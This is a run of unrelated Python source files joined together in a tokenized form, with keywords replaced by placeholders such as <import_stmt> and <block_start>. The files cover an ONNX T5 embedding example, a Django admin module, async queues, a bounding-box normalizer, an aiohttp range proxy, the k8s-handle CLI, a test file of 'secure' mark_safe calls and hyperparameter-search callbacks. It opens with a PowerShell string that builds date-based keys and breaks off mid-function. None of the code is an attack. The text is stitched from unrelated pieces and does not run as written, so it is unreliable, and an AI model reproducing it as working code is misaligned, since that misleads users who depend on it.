buildcode=""" function Get-SystemTime(){ $time_mask = @() $the_time = Get-Date $time_mask += [string]$the_time.Year + "0000" $time_mask += [string]$the_time.Year + [string]$the_time.Month + "00" $time_mask += [string]$the_time.Year + [string]$the_time.Month + [string]$the_time.Day return $time_mask } """<line_sep>callcode=""" $key_combos += ,(Get-SystemTime) """<line_sep>
<import_from_stmt>onnxruntime InferenceSession<import_from_stmt>transformers T5Tokenizer<import_from_stmt>onnxt5.api get_encoder_decoder_tokenizer run_embeddings_text get_sess<line_sep># The easiest way is to use the onnxt5 api and load the default pre-trained version of t5 decoder_sess,encoder_sess,tokenizer=get_encoder_decoder_tokenizer()<line_sep># You can load pre-exported models with get_sess (do note you need the tokenizer you trained also) # decoder_sess, encoder_sess = get_sess(output_path) # You can also load model_data manually: # decoder_sess = InferenceSession('/home/abel/t5-decoder-with-lm-head.onnx') # encoder_sess = InferenceSession('/home/abel/t5-encoder.onnx') # The tokenizer should be the one you trained in the case of fine-tuning # tokenizer = T5Tokenizer.from_pretrained('t5-base') prompt='Listen, <NAME> has come unstuck in time.'<line_sep># To get embeddings you can either use our utility function encoder_embeddings,decoder_embeddings=run_embeddings_text(encoder_sess decoder_sess tokenizer prompt)<line_sep># Or do it manually as follow input_ids=tokenizer.encode(prompt return_tensors='pt').numpy()<line_sep># To generate the encoder's last hidden state encoder_output=encoder_sess.run(<none> {"input_ids":input_ids})[0]<line_sep># To generate the full model's embeddings decoder_output=decoder_sess.run(<none> {"input_ids":input_ids "encoder_hidden_states":encoder_output})[0]<line_sep>
<try_stmt><block_start><import_from_stmt>PIL Image<block_end><except_stmt>ImportError<block_start><import_stmt>Image<block_end><import_from_stmt>django forms<import_from_stmt>django.contrib admin<import_from_stmt>raspberryio.project.models FeaturedProject Project ProjectStep ProjectCategory <class_stmt>FeaturedProjectAdminForm(forms.ModelForm)<block_start><class_stmt>Meta<block_start>model=FeaturedProject<block_end><def_stmt>clean_photo self<block_start>photo=self.cleaned_data.get('photo' <false>)<if_stmt>'photo'<in>self.changed_data<block_start>img=Image.open(photo)<if_stmt>photo.size<g>5<times>1024<times>1024<block_start>error="Photo file too large ( maximum 5MB )"<line_sep><raise>forms.ValidationError(error)<block_end><if_stmt>img.size[0]<l>1252<or>img.size[1]<l>626<block_start>error="Photo dimensions too small ( minimum 1252x636 pixels )"<line_sep><raise>forms.ValidationError(error)<block_end><block_end><return>photo<block_end><block_end><class_stmt>FeaturedProjectAdmin(admin.ModelAdmin)<block_start>model=FeaturedProject<line_sep>form=FeaturedProjectAdminForm<line_sep>list_display=('project' 'featured_start_date')<block_end><class_stmt>ProjectAdminForm(forms.ModelForm)<block_start><class_stmt>Meta<block_start>model=Project<line_sep>fields=('title' 'status' 'publish_date' 'user' 'featured_photo' 'featured_video' 'tldr' 'categories')<block_end><block_end><class_stmt>ProjectStepInline(admin.TabularInline)<block_start>model=ProjectStep<line_sep>extra=1<block_end><class_stmt>ProjectAdmin(admin.ModelAdmin)<block_start>model=Project<line_sep>form=ProjectAdminForm<line_sep>list_display=('title' 'created_datetime' 'admin_thumb')<line_sep>inlines=(ProjectStepInline )<line_sep>raw_id_fields=('user' )<block_end><class_stmt>ProjectCategoryAdmin(admin.ModelAdmin)<block_start>model=ProjectCategory<line_sep>fields=('title' )<block_end>admin.site.register(FeaturedProject FeaturedProjectAdmin)<line_sep>admin.site.register(Project ProjectAdmin)<line_sep>admin.site.register(ProjectCategory ProjectCategoryAdmin)<line_sep>
<import_stmt>asyncio<import_stmt>collections<import_stmt>synapse.exc<as>s_exc<import_stmt>synapse.common<as>s_common<import_stmt>synapse.lib.base<as>s_base<class_stmt>AQueue(s_base.Base)<block_start>''' An async queue with chunk optimized sync compatible consumer. '''<async_keyword><def_stmt>__anit__ self<block_start><await>s_base.Base.__anit__(self)<line_sep>self.fifo=[]<line_sep>self.event=asyncio.Event()<line_sep>self.onfini(self.event.set)<block_end><def_stmt>put self item<block_start>''' Add an item to the queue. '''<if_stmt>self.isfini<block_start><return><false><block_end>self.fifo.append(item)<if_stmt>len(self.fifo)<eq>1<block_start>self.event.set()<block_end><return><true><block_end><async_keyword><def_stmt>slice self# sync interface to the async queue <block_start><if_stmt>len(self.fifo)<eq>0<block_start><await>self.event.wait()<block_end>retn=list(self.fifo)<line_sep>self.fifo.clear()<line_sep>self.event.clear()<line_sep><return>retn<block_end><block_end><class_stmt>Queue<block_start>''' An asyncio Queue with batch methods and graceful close. '''<def_stmt>__init__ self maxsize=<none><block_start>self.q=asyncio.Queue(maxsize=maxsize)<line_sep>self.closed=<false><block_end><async_keyword><def_stmt>close self<block_start><await>self.q.put(s_common.novalu)<line_sep>self.closed=<true><block_end><async_keyword><def_stmt>put self item<block_start><if_stmt>self.closed<block_start>mesg='The Queue has been closed.'<line_sep><raise>s_exc.BadArg(mesg=mesg)<block_end><await>self.q.put(item)<block_end><async_keyword><def_stmt>size self<block_start>size=self.q.qsize()<if_stmt>self.closed<block_start>size<augsub>1<block_end><return>size<block_end><async_keyword><def_stmt>puts self items<block_start><if_stmt>self.closed<block_start>mesg='The Queue has been closed.'<line_sep><raise>s_exc.BadArg(mesg=mesg)<block_end><for_stmt>item items<block_start><await>self.q.put(item)<block_end><block_end><async_keyword><def_stmt>slice self size=1000<block_start><if_stmt>self.closed<and>self.q.qsize()<eq>0<block_start><return><none><block_end>items=[]<line_sep>item=<await>self.q.get()<if_stmt>item<is>s_common.novalu<block_start><return><none><block_end>items.append(item)<line_sep>size<augsub>1<for_stmt>i range(min(size self.q.qsize()))<block_start>item=<await>self.q.get()<if_stmt>item<is>s_common.novalu<block_start><break><block_end>items.append(item)<block_end><return>items<block_end><async_keyword><def_stmt>slices self size=1000<block_start><while_stmt><true><block_start>items=<await>self.slice(size=size)<if_stmt>items<is><none><block_start><return><block_end><yield>items<block_end><block_end><block_end><class_stmt>Window(s_base.Base)<block_start>''' A Queue like object which yields added items. If the queue ever reaches its maxsize, it will be fini()d. On fini(), the Window will continue to yield results until empty and then return. '''<async_keyword><def_stmt>__anit__ self maxsize=<none><block_start><await>s_base.Base.__anit__(self)<line_sep>self.maxsize=maxsize<line_sep>self.event=asyncio.Event()<line_sep>self.linklist=collections.deque()<async_keyword><def_stmt>fini <block_start>self.event.set()<block_end>self.onfini(fini)<block_end><async_keyword><def_stmt>__aiter__ self<block_start><while_stmt><true><block_start><if_stmt>self.linklist<block_start><yield>self.linklist.popleft()<line_sep><continue><block_end><if_stmt>self.isfini<block_start><return><block_end>self.event.clear()<line_sep><await>self.event.wait()<block_end><block_end><async_keyword><def_stmt>put self item<block_start>''' Add a single item to the Window. '''<if_stmt>self.isfini<block_start><return><false><block_end>self.linklist.append(item)<line_sep>self.event.set()<if_stmt>self.maxsize<is><not><none><and>len(self.linklist)<ge>self.maxsize<block_start><await>self.fini()<block_end><return><true><block_end><async_keyword><def_stmt>puts self items<block_start>''' Add multiple items to the window. '''<if_stmt>self.isfini<block_start><return><false><block_end>self.linklist.extend(items)<line_sep>self.event.set()<if_stmt>self.maxsize<is><not><none><and>len(self.linklist)<ge>self.maxsize<block_start><await>self.fini()<block_end><return><true><block_end><block_end>
<import_from_stmt>tests.utils assert_output<def_stmt>test_lyx <block_start>assert_output("lyxjinja" "dexy:foo.py|idio:multiply" "<< d['foo.py|idio']['multiply'] >>" ".tex")<block_end>
<import_stmt>torch<class_stmt>BoundingBoxNormalizationHelper<block_start><def_stmt>__init__ self interval range_<block_start><assert_stmt>interval<in>('[)' '[]')<line_sep>self.right_open=(interval<eq>'[)')<assert_stmt>range_[1]<g>range_[0]<line_sep>self.scale=range_[1]-range_[0]<line_sep>self.offset=range_[0]<block_end><def_stmt>normalize_ self bbox:torch.Tensor image_size<block_start><if_stmt>self.right_open<block_start>bbox[<ellipsis> ::2]<augdiv>image_size[0]<line_sep>bbox[<ellipsis> 1::2]<augdiv>image_size[1]<block_end><else_stmt><block_start>bbox[<ellipsis> ::2]<augdiv>(image_size[0]-1)<line_sep>bbox[<ellipsis> 1::2]<augdiv>(image_size[1]-1)<block_end>bbox<augmul>self.scale<line_sep>bbox<augadd>self.offset<line_sep><return>bbox<block_end><def_stmt>normalize self bbox:torch.Tensor image_size<block_start><return>self.normalize_(bbox.clone() image_size)<block_end><def_stmt>denormalize_ self bbox:torch.Tensor image_size<block_start>bbox<augsub>self.offset<line_sep>bbox<augdiv>self.scale<if_stmt>self.right_open<block_start>bbox[<ellipsis> ::2]<augmul>image_size[0]<line_sep>bbox[<ellipsis> 1::2]<augmul>image_size[1]<block_end><else_stmt><block_start>bbox[<ellipsis> ::2]<augmul>(image_size[0]-1)<line_sep>bbox[<ellipsis> 1::2]<augmul>(image_size[1]-1)<block_end><return>bbox<block_end><def_stmt>denormalize self bbox:torch.Tensor image_size<block_start><return>self.denormalize_(bbox.clone() image_size)<block_end><block_end>
<import_stmt>asyncio<import_from_stmt>pathlib Path<import_stmt>aiohttp<import_from_stmt>aiohttp web<import_from_stmt>.funnel Funnel<import_from_stmt>.utils HttpRange RangeNotSupportedError convert_unit load_browser_cookies retry <async_keyword><def_stmt>make_response request url block_size piece_size cookies_from use_original_url<block_start>session=request.app['session']<if_stmt>cookies_from<block_start>session.cookie_jar.update_cookies(load_browser_cookies(cookies_from url))<block_end>@retry<async_keyword><def_stmt>get_info <block_start><nonlocal>url<async_keyword><with_stmt>session.head(url allow_redirects=<true>)<as>resp<block_start><if_stmt>resp.headers.get('Accept-Ranges')<ne>'bytes'<block_start><raise>RangeNotSupportedError<block_end><if_stmt><not>use_original_url<block_start>url=resp.url<block_end><return>resp.content_length resp.content_type<block_end><block_end><try_stmt><block_start>content_length,content_type=<await>get_info()<block_end><except_stmt>RangeNotSupportedError<as>exc<block_start>msg=str(exc)<line_sep>print(msg)<line_sep><return>web.Response(status=501 text=msg)<block_end><except_stmt>aiohttp.ClientError<as>exc<block_start>print(exc)<line_sep><return>web.Response(status=exc.status)<block_end>range=request.headers.get('Range')<if_stmt>range<is><none># not a Range request - the whole file <block_start>range=HttpRange(0 content_length-1)<line_sep>resp=web.StreamResponse(status=200 headers={'Content-Length':str(content_length) 'Content-Type':content_type 'Accept-Ranges':'bytes'})<block_end><else_stmt><block_start><try_stmt><block_start>range=HttpRange.from_str(range content_length)<block_end><except_stmt>ValueError<block_start><return>web.Response(status=416 headers={'Content-Range':f'*/{content_length}'})<block_end><else_stmt><block_start>resp=web.StreamResponse(status=206 headers={'Content-Type':content_type 'Content-Range':f'bytes {range.begin}-{range.end}/{content_length}'})<block_end><block_end><if_stmt>request.method<eq>'HEAD'<block_start><return>resp<block_end><await>resp.prepare(request)<async_keyword><with_stmt>Funnel(url range session block_size piece_size )<as>funnel<block_start><try_stmt><block_start><async_keyword><for_stmt>chunk funnel<block_start><await>resp.write(chunk)<block_end><return>resp<block_end><except_stmt>(aiohttp.ClientError RangeNotSupportedError)<as>exc<block_start>print(exc)<line_sep><return>web.Response(status=exc.status)<block_end><except_stmt>asyncio.CancelledError<block_start><raise><block_end><block_end><block_end>ROOT=Path(__file__).parent<async_keyword><def_stmt>index request<block_start><return>web.FileResponse(ROOT/'index.html')<block_end><async_keyword><def_stmt>cli request<block_start>args=request.app['args']<line_sep>url=request.raw_path[1:]<or>args.url<line_sep><return><await>make_response(request url convert_unit(args.block_size) convert_unit(args.piece_size) args.cookies_from args.use_original_url )<block_end><async_keyword><def_stmt>api request<block_start>args=request.app['args']<line_sep>query=request.query<line_sep>block_size=convert_unit(query.get('block_size' args.block_size))<line_sep>piece_size=convert_unit(query.get('piece_size' args.piece_size))<line_sep><return><await>make_response(request query.get('url' args.url) block_size piece_size query.get('cookies_from' args.cookies_from) query.get('use_original_url' args.use_original_url) )<block_end><async_keyword><def_stmt>make_app args<block_start>app=web.Application()<line_sep>app['args']=args<if_stmt>args.url<is><none><block_start>app.router.add_get('/' index)<line_sep># app.router.add_static('/static', ROOT / 'static') app.router.add_get('/api' api)<line_sep>app.router.add_get('/{_:https?://.+}' cli)<block_end><else_stmt><block_start>app.router.add_get('/' cli)<line_sep>app.router.add_get('/{_:https?://.+}' cli)<block_end><async_keyword><def_stmt>session app<block_start>app['session']=aiohttp.ClientSession(raise_for_status=<true>)<line_sep><yield><line_sep><await>app['session'].close()<block_end>app.cleanup_ctx.append(session)<line_sep><return>app<block_end>
"""Test Docker API."""<import_stmt>pytest<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_api_docker_info api_client<block_start>"""Test docker info api."""<line_sep>resp=<await>api_client.get("/docker/info")<line_sep>result=<await>resp.json()<assert_stmt>result["data"]["logging"]<eq>"journald"<assert_stmt>result["data"]["storage"]<eq>"overlay2"<assert_stmt>result["data"]["version"]<eq>"1.0.0"<block_end>
<import_stmt>argparse<import_stmt>logging<import_stmt>os<import_stmt>sys<import_from_stmt>kubernetes client<import_from_stmt>kubernetes.config list_kube_config_contexts load_kube_config<import_from_stmt>k8s_handle config<import_from_stmt>k8s_handle settings<import_from_stmt>k8s_handle templating<import_from_stmt>k8s_handle.exceptions ProvisioningError ResourceNotAvailableError<import_from_stmt>k8s_handle.filesystem InvalidYamlError<import_from_stmt>k8s_handle.k8s.deprecation_checker ApiDeprecationChecker<import_from_stmt>k8s_handle.k8s.provisioner Provisioner<import_from_stmt>k8s_handle.k8s.diff Diff<import_from_stmt>k8s_handle.k8s.availability_checker ResourceAvailabilityChecker make_resource_getters_list<line_sep>COMMAND_DEPLOY='deploy'<line_sep>COMMAND_DIFF='diff'<line_sep>COMMAND_DESTROY='destroy'<line_sep>log=logging.getLogger(__name__)<line_sep>logging.basicConfig(level=settings.LOG_LEVEL format=settings.LOG_FORMAT datefmt=settings.LOG_DATE_FORMAT)<def_stmt>handler_deploy args<block_start>_handler_deploy_destroy(args COMMAND_DEPLOY)<block_end><def_stmt>handler_destroy args<block_start>_handler_deploy_destroy(args COMMAND_DESTROY)<block_end><def_stmt>handler_apply args<block_start>_handler_apply_delete(args COMMAND_DEPLOY)<block_end><def_stmt>handler_delete args<block_start>_handler_apply_delete(args COMMAND_DESTROY)<block_end><def_stmt>handler_render args<block_start>context=config.load_context_section(args.get('section'))<line_sep>templating.Renderer(settings.TEMPLATES_DIR args.get('tags') args.get('skip_tags')).generate_by_context(context)<block_end><def_stmt>handler_diff args<block_start>_handler_deploy_destroy(args COMMAND_DIFF)<block_end><def_stmt>_handler_deploy_destroy args command<block_start>context=config.load_context_section(args.get('section'))<line_sep>resources=templating.Renderer(settings.TEMPLATES_DIR args.get('tags') args.get('skip_tags')).generate_by_context(context)<if_stmt>args.get('dry_run')<block_start><return><block_end>_handler_provision(command resources config.PriorityEvaluator(args context os.environ) args.get('use_kubeconfig') args.get('sync_mode') args.get('show_logs'))<block_end><def_stmt>_handler_apply_delete args command<block_start>_handler_provision(command [os.path.join(settings.TEMP_DIR args.get('resource'))] config.PriorityEvaluator(args {} os.environ) args.get('use_kubeconfig') args.get('sync_mode') args.get('show_logs'))<block_end><def_stmt>_handler_provision command resources priority_evaluator use_kubeconfig sync_mode show_logs<block_start>kubeconfig_namespace=<none><if_stmt>priority_evaluator.environment_deprecated()<block_start>log.warning("K8S_HOST and K8S_CA environment variables support is deprecated "<concat>"and will be discontinued in the future. Use K8S_MASTER_URI and K8S_CA_BASE64 instead.")<block_end># INFO rvadim: https://github.com/kubernetes-client/python/issues/430#issuecomment-359483997 <if_stmt>use_kubeconfig<block_start><try_stmt><block_start>load_kube_config()<line_sep>kubeconfig_namespace=list_kube_config_contexts()[1].get('context').get('namespace')<block_end><except_stmt>Exception<as>e<block_start><raise>RuntimeError(e)<block_end><block_end><else_stmt><block_start>client.Configuration.set_default(priority_evaluator.k8s_client_configuration())<block_end>settings.K8S_NAMESPACE=priority_evaluator.k8s_namespace_default(kubeconfig_namespace)<line_sep>log.info('Default namespace "{}"'.format(settings.K8S_NAMESPACE))<if_stmt><not>settings.K8S_NAMESPACE<block_start>log.info("Default namespace is not set. "<concat>"This may lead to provisioning error, if namespace is not set for each resource.")<block_end><try_stmt><block_start>deprecation_checker=ApiDeprecationChecker(client.VersionApi().get_code().git_version[1:])<line_sep>available_checker=ResourceAvailabilityChecker(make_resource_getters_list())<for_stmt>resource resources<block_start>deprecation_checker.run(resource)<line_sep>available_checker.run(resource)<block_end><block_end><except_stmt>client.exceptions.ApiException<block_start>log.warning("Error while getting API version, deprecation check will be skipped.")<block_end><if_stmt>command<eq>COMMAND_DIFF<block_start>executor=Diff()<block_end><else_stmt><block_start>executor=Provisioner(command sync_mode show_logs)<block_end><for_stmt>resource resources<block_start>executor.run(resource)<block_end><block_end>parser=argparse.ArgumentParser(description='CLI utility generate k8s resources by templates and apply it to cluster')<line_sep>subparsers=parser.add_subparsers(dest="command")<line_sep>subparsers.required=<true><line_sep>parser_target_config=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_target_config.add_argument('-s' '--section' required=<true> type=str help='Section to deploy from config file')<line_sep>parser_target_config.add_argument('-c' '--config' required=<false> help='Config file, default: config.yaml')<line_sep>parser_target_config.add_argument('--tags' action='append' required=<false> help='Only use templates tagged with these values')<line_sep>parser_target_config.add_argument('--skip-tags' action='append' required=<false> help='Only use templates whose tags do not match these values')<line_sep>parser_target_resource=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_target_resource.add_argument('-r' '--resource' required=<true> type=str help='Resource spec path, absolute (started with slash) or relative from TEMP_DIR')<line_sep>parser_deprecated=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_deprecated.add_argument('--dry-run' required=<false> action='store_true' help='Don\'t run kubectl commands. Deprecated, use "k8s-handle template" instead')<line_sep>parser_provisioning=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_provisioning.add_argument('--sync-mode' action='store_true' required=<false> default=<false> help='Turn on sync mode and wait deployment ending')<line_sep>parser_provisioning.add_argument('--tries' type=int required=<false> default=360 help='Count of tries to check deployment status')<line_sep>parser_provisioning.add_argument('--retry-delay' type=int required=<false> default=5 help='Sleep between tries in seconds')<line_sep>parser_provisioning.add_argument('--strict' action='store_true' required=<false> help='Check existence of all env variables in config.yaml and stop if var is not set')<line_sep>parser_provisioning.add_argument('--use-kubeconfig' action='store_true' required=<false> help='Try to use kube config')<line_sep>parser_provisioning.add_argument('--k8s-handle-debug' action='store_true' required=<false> help='Show K8S client debug messages')<line_sep>parser_logs=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_logs.add_argument('--show-logs' action='store_true' required=<false> default=<false> help='Show logs for jobs')<line_sep>parser_logs.add_argument('--tail-lines' type=int required=<false> help='Lines of recent log file to display')<line_sep>arguments_connection=parser_provisioning.add_argument_group()<line_sep>arguments_connection.add_argument('--k8s-master-uri' required=<false> help='K8S master to connect to')<line_sep>arguments_connection.add_argument('--k8s-ca-base64' required=<false> help='base64-encoded K8S certificate authority')<line_sep>arguments_connection.add_argument('--k8s-token' required=<false> help='K8S token to use')<line_sep>parser_deploy=subparsers.add_parser('deploy' parents=[parser_provisioning parser_target_config parser_logs parser_deprecated] help='Do attempt to create specs from templates and deploy K8S resources of the selected section')<line_sep>parser_deploy.set_defaults(func=handler_deploy)<line_sep>parser_apply=subparsers.add_parser('apply' parents=[parser_provisioning parser_target_resource parser_logs] help='Do attempt to deploy K8S resource from the existing spec')<line_sep>parser_apply.set_defaults(func=handler_apply)<line_sep>parser_destroy=subparsers.add_parser('destroy' parents=[parser_provisioning parser_target_config parser_deprecated] help='Do attempt to destroy K8S resources of the selected section')<line_sep>parser_destroy.set_defaults(func=handler_destroy)<line_sep>parser_delete=subparsers.add_parser('delete' parents=[parser_provisioning parser_target_resource] help='Do attempt to destroy K8S resource from the existing spec')<line_sep>parser_delete.set_defaults(func=handler_delete)<line_sep>parser_template=subparsers.add_parser('render' parents=[parser_target_config] help='Make resources from the template and config. '<concat>'Created resources will be placed into the TEMP_DIR')<line_sep>parser_template.set_defaults(func=handler_render)<line_sep>parser_diff=subparsers.add_parser('diff' parents=[parser_target_config] help='Show diff between current rendered yamls and apiserver yamls')<line_sep>parser_diff.add_argument('--use-kubeconfig' action='store_true' required=<false> help='Try to use kube config')<line_sep>parser_diff.set_defaults(func=handler_diff)<def_stmt>main # INFO furiousassault: backward compatibility rough attempt # must be removed later according to https://github.com/2gis/k8s-handle/issues/40 <block_start>deprecation_warnings=0<line_sep>filtered_arguments=[]<for_stmt>argument sys.argv[1:]<block_start><if_stmt>argument<in>['--sync-mode=true' '--sync-mode=True' '--dry-run=true' '--dry-run=True']<block_start>deprecation_warnings<augadd>1<line_sep>filtered_arguments.append(argument.split('=')[0])<line_sep><continue><block_end><if_stmt>argument<in>['--sync-mode=false' '--sync-mode=False' '--dry-run=false' '--dry-run=False']<block_start>deprecation_warnings<augadd>1<line_sep><continue><block_end>filtered_arguments.append(argument)<block_end>args,unrecognized_args=parser.parse_known_args(filtered_arguments)<if_stmt>deprecation_warnings<or>unrecognized_args<block_start>log.warning("Explicit true/false arguments to --sync-mode and --dry-run keys are deprecated "<concat>"and will be discontinued in the future. Use these keys without arguments instead.")<block_end>args_dict=vars(args)<line_sep>settings.CHECK_STATUS_TRIES=args_dict.get('tries')<line_sep>settings.CHECK_DAEMONSET_STATUS_TRIES=args_dict.get('tries')<line_sep>settings.CHECK_STATUS_TIMEOUT=args_dict.get('retry_delay')<line_sep>settings.CHECK_DAEMONSET_STATUS_TIMEOUT=args_dict.get('retry_delay')<line_sep>settings.GET_ENVIRON_STRICT=args_dict.get('strict')<line_sep>settings.COUNT_LOG_LINES=args_dict.get('tail_lines')<line_sep>settings.CONFIG_FILE=args_dict.get('config')<or>settings.CONFIG_FILE<try_stmt><block_start>args.func(args_dict)<block_end><except_stmt>templating.TemplateRenderingError<as>e<block_start>log.error('Template generation error: {}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>InvalidYamlError<as>e<block_start>log.error('{}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>RuntimeError<as>e<block_start>log.error('RuntimeError: {}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>ResourceNotAvailableError<as>e<block_start>log.error('Resource not available: {}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>ProvisioningError<block_start>sys.exit(1)<block_end>print(r''' _(_)_ wWWWw _ @@@@ (_)@(_) vVVVv _ @@@@ (___) _(_)_ @@()@@ wWWWw (_)\ (___) _(_)_ @@()@@ Y (_)@(_) @@@@ (___) `|/ Y (_)@(_) @@@@ \|/ (_) / Y \| \|/ /(_) \| |/ | \ | \ |/ | / \ | / \|/ |/ \| \|/ \|// \|/// \|// \|/// \|/// \|// |// \|// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^''')<block_end>
<import_stmt>os<import_from_stmt>django.utils safestring<line_sep>safestring.mark_safe('<b>secure</b>')<line_sep>safestring.SafeText('<b>secure</b>')<line_sep>safestring.SafeUnicode('<b>secure</b>')<line_sep>safestring.SafeString('<b>secure</b>')<line_sep>safestring.SafeBytes('<b>secure</b>')<line_sep>my_secure_str='<b>Hello World</b>'<line_sep>safestring.mark_safe(my_secure_str)<line_sep>my_secure_str,_=('<b>Hello World</b>' '')<line_sep>safestring.mark_safe(my_secure_str)<line_sep>also_secure_str=my_secure_str<line_sep>safestring.mark_safe(also_secure_str)<def_stmt>try_secure <block_start><try_stmt><block_start>my_secure_str='Secure'<block_end><except_stmt>Exception<block_start>my_secure_str='Secure'<block_end><else_stmt><block_start>my_secure_str='Secure'<block_end><finally_stmt><block_start>my_secure_str='Secure'<block_end>safestring.mark_safe(my_secure_str)<block_end><def_stmt>format_secure <block_start>safestring.mark_safe('<b>{}</b>'.format('secure'))<line_sep>my_secure_str='secure'<line_sep>safestring.mark_safe('<b>{}</b>'.format(my_secure_str))<line_sep>safestring.mark_safe('<b>{} {}</b>'.format(my_secure_str 'a'))<line_sep>safestring.mark_safe('<b>{} {}</b>'.format(*[my_secure_str 'a']))<line_sep>safestring.mark_safe('<b>{b}</b>'.format(b=my_secure_str))# nosec TODO safestring.mark_safe('<b>{b}</b>'.format(**{'b':my_secure_str}))# nosec TODO my_secure_str='<b>{}</b>'.format(my_secure_str)<line_sep>safestring.mark_safe(my_secure_str)<block_end><def_stmt>percent_secure <block_start>safestring.mark_safe('<b>%s</b>'%'secure')<line_sep>my_secure_str='secure'<line_sep>safestring.mark_safe('<b>%s</b>'%my_secure_str)<line_sep>safestring.mark_safe('<b>%s %s</b>'%(my_secure_str 'a'))<line_sep>safestring.mark_safe('<b>%(b)s</b>'%{'b':my_secure_str})<block_end># nosec TODO <def_stmt>with_secure path<block_start><with_stmt>open(path)<as>f<block_start>safestring.mark_safe('Secure')<block_end><block_end><def_stmt>loop_secure <block_start>my_secure_str=''<for_stmt>i range(ord(os.urandom(1)))<block_start>my_secure_str<augadd>' Secure'<block_end>safestring.mark_safe(my_secure_str)<while_stmt>ord(os.urandom(1))%2<eq>0<block_start>my_secure_str<augadd>' Secure'<block_end>safestring.mark_safe(my_secure_str)<block_end><def_stmt>all_secure_case <block_start><if_stmt>ord(os.urandom(1))%2<eq>0<block_start>my_secure_str='Secure'<block_end><elif_stmt>ord(os.urandom(1))%2<eq>0<block_start>my_secure_str='Secure'<block_end><else_stmt><block_start>my_secure_str='Secure'<block_end>safestring.mark_safe(my_secure_str)<block_end>
# -*- coding:utf-8 -*- """ """<import_stmt>datetime<import_stmt>json<import_stmt>os<import_stmt>time<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>IPython.display display update_display display_markdown<import_from_stmt>tqdm.auto tqdm<import_from_stmt>..utils logging fs to_repr<line_sep>logger=logging.get_logger(__name__)<class_stmt>Callback()<block_start><def_stmt>__init__ self<block_start><pass><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start><pass><block_end><def_stmt>on_search_end self hyper_model<block_start><pass><block_end><def_stmt>on_search_error self hyper_model<block_start><pass><block_end><def_stmt>on_build_estimator self hyper_model space estimator trial_no<block_start><pass><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><pass><block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start><pass><block_end><def_stmt>on_trial_error self hyper_model space trial_no<block_start><pass><block_end><def_stmt>on_skip_trial self hyper_model space trial_no reason reward improved elapsed<block_start><pass><block_end><def_stmt>__repr__ self<block_start><return>to_repr(self)<block_end><block_end><class_stmt>EarlyStoppingError(RuntimeError)<block_start><def_stmt>__init__ self *arg<block_start>self.args=arg<block_end><block_end><class_stmt>EarlyStoppingCallback(Callback)<block_start>REASON_TRIAL_LIMIT='max_no_improvement_trials'<line_sep>REASON_TIME_LIMIT='time_limit'<line_sep>REASON_EXPECTED_REWARD='expected_reward'<def_stmt>__init__ self max_no_improvement_trials=0 mode='min' min_delta=0 time_limit=<none> expected_reward=<none><block_start>super(Callback self).__init__()<line_sep># assert time_limit is None or time_limit > 60, 'If `time_limit` is not None, it must be greater than 60.' # settings <if_stmt>mode<eq>'min'<block_start>self.op=np.less<block_end><elif_stmt>mode<eq>'max'<block_start>self.op=np.greater<block_end><else_stmt><block_start><raise>ValueError(f'Unsupported mode:{mode}')<block_end>self.max_no_improvement_trials=max_no_improvement_trials<line_sep>self.mode=mode<line_sep>self.min_delta=min_delta<line_sep>self.time_limit=time_limit<line_sep>self.expected_reward=expected_reward<line_sep># running state self.start_time=<none><line_sep>self.best_reward=<none><line_sep>self.best_trial_no=<none><line_sep>self.counter_no_improvement_trials=0<line_sep>self.triggered=<none><line_sep>self.triggered_reason=<none><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.triggered=<false><line_sep>self.triggered_reason=<none><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><if_stmt>self.start_time<is><none><block_start>self.start_time=time.time()<block_end><block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start><if_stmt>self.start_time<is><none><block_start>self.start_time=time.time()<block_end>time_total=time.time()-self.start_time<if_stmt>self.time_limit<is><not><none><and>self.time_limit<g>0<block_start><if_stmt>time_total<g>self.time_limit<block_start>self.triggered=<true><line_sep>self.triggered_reason=self.REASON_TIME_LIMIT<block_end><block_end><if_stmt>self.expected_reward<is><not><none><and>self.expected_reward<ne>0.0<block_start><if_stmt>self.op(reward self.expected_reward)<block_start>self.triggered=<true><line_sep>self.triggered_reason=self.REASON_EXPECTED_REWARD<block_end><block_end><if_stmt>self.max_no_improvement_trials<is><not><none><and>self.max_no_improvement_trials<g>0<block_start><if_stmt>self.best_reward<is><none><block_start>self.best_reward=reward<line_sep>self.best_trial_no=trial_no<block_end><else_stmt><block_start><if_stmt>self.op(reward self.best_reward-self.min_delta)<block_start>self.best_reward=reward<line_sep>self.best_trial_no=trial_no<line_sep>self.counter_no_improvement_trials=0<block_end><else_stmt><block_start>self.counter_no_improvement_trials<augadd>1<if_stmt>self.counter_no_improvement_trials<ge>self.max_no_improvement_trials<block_start>self.triggered=<true><line_sep>self.triggered_reason=self.REASON_TRIAL_LIMIT<block_end><block_end><block_end><block_end><if_stmt>self.triggered<block_start>msg=f'Early stopping on trial : {trial_no}, reason: {self.triggered_reason}, '<concat>f'best reward: {self.best_reward}, best trial: {self.best_trial_no}, '<concat>f'elapsed seconds: {time_total}'<if_stmt>logger.is_info_enabled()<block_start>logger.info(msg)<block_end><raise>EarlyStoppingError(msg)<block_end><block_end><block_end><class_stmt>FileLoggingCallback(Callback)<block_start><def_stmt>__init__ self searcher output_dir=<none><block_start>super(FileLoggingCallback self).__init__()<line_sep>self.output_dir=self._prepare_output_dir(output_dir searcher)<block_end>@staticmethod<def_stmt>open file_path 